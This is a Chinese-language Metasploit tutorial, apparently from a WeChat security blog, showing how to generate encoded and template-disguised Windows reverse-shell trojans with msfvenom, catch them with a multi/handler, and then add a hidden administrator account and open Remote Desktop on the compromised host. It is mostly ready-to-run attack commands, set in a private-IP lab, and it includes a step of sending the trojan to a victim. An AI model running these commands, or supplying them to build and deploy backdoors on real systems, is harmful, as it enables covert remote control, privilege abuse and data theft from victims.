作者:Secbug
时间:20220904
公众号:漫步安全
知识星球:漫步安全
说明:知识有限,如有错误,还请指出,多担待。多谷歌、Github、百度,查看官方文档。
Metasploit Framework
metasploit Framework(MSF)漏洞利用框架
目前存在free、pro版,kali自带free版metasploit框架。
msfvenom 为metasploit框架中的木马生成器模块,用于生成木马。
msfconsole 为metasploit框架中控制台模块,用于控制受害者。
msfvenom
木马生成器
可生成php、asp、jsp、jar、apk、shell、exe多种木马。
msfvenom常用选项
-l <type> 列出所有的载荷、编码器、空指令...
-p <payload> 指定载荷或自定义载荷
-f <format> 指定输出格式
-e <encoder> 指定编码器格式
-a <arch> 指定架构
-o <path> 指定输出文件
-b <list> 去除坏字节
-i <count> 指定编码次数
-x <path> 指定模板
-k 当使用模板后,程序执行后,载荷将被分离到新的线程中执行
查看payloads
msfvenom --list payloads
查看encoders
msfvenom --list encoders
生成木马文件
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.26.131 LPORT=4444 --platform win --arch x86 -f exe -o S.exe
不同的payload,有不同的配置选项 可通过msfvenom -p payload —list-options来显示需要配置的环境
使用编码器生成木马文件
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.26.131 LPORT=4444 -e x86/shikata_ga_nai -i 10 --platform win --arch x86 -f exe -o S.exe
使用模板生成木马文件
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.26.131 LPORT=4444 -x ./template.exe -k --platform win --arch x86 -f exe -o S.exe
生成C代码
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.26.131 LPORT=4444 -a x86 --platform windows -e x86/shikata_ga_nai -i 15 -b 'x00' -f c -o shell.c
x00在C语言字符串中表示截断,所以需要去除掉x00 可以将代码内嵌进入其它源代码中编译,在程序运行时,主动加载运行
msfconsole
监控平台
使用方法
开启msf控制台
msfconsole
设置监听环境
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST 192.168.26.131
set LPORT 4444
exploit
不同的模块,有不同的配置选项 可通过执行options来查看
整体流程
-
msfvenom生成木马文件 -
将木马文件拷贝到受害机器 -
控制台设置相关参数,监听或发起连接 -
执行木马文件
反向shell msfvenom 需要指定攻击者方IP地址 msfconsole 需要设置攻击方IP地址 正向shell msfvenom 需要指定本地PORT,以便攻击方进行主动连接 msfconsole 需要指定受害者IP、PORT,主动连接受害者机器 两者区别:反向Shell由受害方主动发起连接,一般防火墙不会主动拦截
演示
实验环境
-
KaLi 2022虚拟机 -
windows XP虚拟机
实验过程中,可能需要临时关闭杀毒软件
实验过程
-
msfvenom生成木马文件
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.26.131 LPORT=4444 -x ./SatGenNMEA.exe -k --platform win --arch x86 -f exe -o S.exe
Untitled -
msfconsole开启监控
Untitled -
发送给受害者
Untitled -
点击运行
Untitled -
msfconsole收到shell
Untitled -
更多命令
?
Untitled 查看路径、进程列表
Untitled 权限提升(msf会尝试内置的权限提升脚本进行提权)
Untitled 查看网络进程
Untitled 后续利用
shell 获取命令行交互
upload 上传
download 下载
screenshare 监控屏幕监控屏幕
screenshare
Untitled 添加管理员账户,开启远程桌面登录
shell
net user test test /add
net user test
net localgroup administrators test /addUsers组
Untitled Administrators组
Untitled 远程桌面连接
受害者shell中执行
windows 家庭版可能无wmic,可以拷贝一份,利用upload上传
设置远程桌面端口
reg add "HKLMSystemCurrentControlSetControlTerminal ServerWinStationsRDP-Tcp" /t REG_DWORD /v portnumber /d 3389 /f
#开启远程桌面
wmic RDTOGGLE WHERE ServerName='%COMPUTERNAME%' call SetAllowTSConnections 1
#检查端口状态
netstat -an|find "3389"
#关闭远程桌面
wmic RDTOGGLE WHERE ServerName='%COMPUTERNAME%' call SetAllowTSConnections 0kali console执行
rdesktop 192.168.26.130
更多参考文章
-
https://www.pa55w0rd.online/msfvenom _use/ -
https://docs.rapid7.com/metasploit/metasploit-basics/ -
https://blog.csdn.net/liduquan/article/details/103105886
原文始发于微信公众号(漫步安全):Metasploit Framework
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论